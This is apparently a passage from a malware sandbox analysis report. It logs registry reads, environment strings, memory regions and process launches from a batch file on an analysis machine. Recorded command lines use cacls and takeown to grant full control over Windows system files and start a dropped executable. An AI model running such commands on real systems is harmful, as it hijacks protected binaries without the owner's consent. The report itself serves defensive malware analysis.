| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xa14, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xe10, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x4f4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Seyes.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Seyes.jtp" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #19: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Multimedia Platform\separate.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:48, Reason: Child Process |
| Unmonitor | End Time: 00:03:02, Reason: Self Terminated |
| Monitor Duration | 00:01:14 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1b4 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A7C
0x
9F8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000960000 | 0x00960000 | 0x0495ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004960000 | 0x04960000 | 0x0497ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004960000 | 0x04960000 | 0x0496ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004970000 | 0x04970000 | 0x04973fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04981fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04983fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004990000 | 0x04990000 | 0x049a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000049b0000 | 0x049b0000 | 0x049effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049f0000 | 0x049f0000 | 0x04aeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004af0000 | 0x04af0000 | 0x04af3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b00000 | 0x04b00000 | 0x04b00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b10000 | 0x04b10000 | 0x04b11fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b70000 | 0x04b70000 | 0x04b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ba0000 | 0x04ba0000 | 0x04c9ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04ca0000 | 0x04d5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x04e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f50000 | 0x04f50000 | 0x04f5ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04f60000 | 0x05296fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007edc0000 | 0x7edc0000 | 0x7eebffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eec0000 | 0x7eec0000 | 0x7eee2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eee7000 | 0x7eee7000 | 0x7eee9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeea000 | 0x7eeea000 | 0x7eeecfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeed000 | 0x7eeed000 | 0x7eeedfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeef000 | 0x7eeef000 | 0x7eeeffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 64 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 19 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 57 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xee8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xa84, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x828, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "separate.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "separate.exe" |
|
1 |
Process #21: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Journal.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:52, Reason: Child Process |
| Unmonitor | End Time: 00:01:54, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa0c |
| Parent PID | 0xcd4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A24
0x
EC4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000009c0000 | 0x009c0000 | 0x009dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x009cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x009d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x009e1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x00a03fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a10000 | 0x00a10000 | 0x00a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a50000 | 0x00a50000 | 0x00a8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x00a93fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000aa0000 | 0x00aa0000 | 0x00aa0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00ab1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b40000 | 0x00b40000 | 0x00c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cb0000 | 0x00cb0000 | 0x00cbffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00cc0000 | 0x00d7dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00f7ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74060000 | 0x74087fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f220000 | 0x7f220000 | 0x7f31ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f320000 | 0x7f320000 | 0x7f342fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f347000 | 0x7f347000 | 0x7f349fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f34a000 | 0x7f34a000 | 0x7f34cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f34d000 | 0x7f34d000 | 0x7f34dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f34f000 | 0x7f34f000 | 0x7f34ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #22: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:52, Reason: Child Process |
| Unmonitor | End Time: 00:01:54, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa14 |
| Parent PID | 0xb70 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C1C
0x
EA4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000e10000 | 0x00e10000 | 0x00e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e30000 | 0x00e30000 | 0x00e31fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e40000 | 0x00e40000 | 0x00e53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ea0000 | 0x00ea0000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ee0000 | 0x00ee0000 | 0x00ee3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ef0000 | 0x00ef0000 | 0x00ef0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f00000 | 0x00f00000 | 0x00f01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001010000 | 0x01010000 | 0x0101ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f200000 | 0x7f200000 | 0x7f222fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f227000 | 0x7f227000 | 0x7f227fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f22a000 | 0x7f22a000 | 0x7f22cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f22d000 | 0x7f22d000 | 0x7f22dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #23: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Multimedia Platform\separate.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:53, Reason: Child Process |
| Unmonitor | End Time: 00:01:55, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xee8 |
| Parent PID | 0x1b4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EB4
0x
EAC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000e90000 | 0x00e90000 | 0x00eaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e90000 | 0x00e90000 | 0x00e9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000ea0000 | 0x00ea0000 | 0x00ea3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000eb0000 | 0x00eb0000 | 0x00eb1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ec0000 | 0x00ec0000 | 0x00ed3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ee0000 | 0x00ee0000 | 0x00f1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f20000 | 0x00f20000 | 0x00f5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f60000 | 0x00f60000 | 0x00f63fff | Pagefile Backed Memory | r |
|
|
|
- |
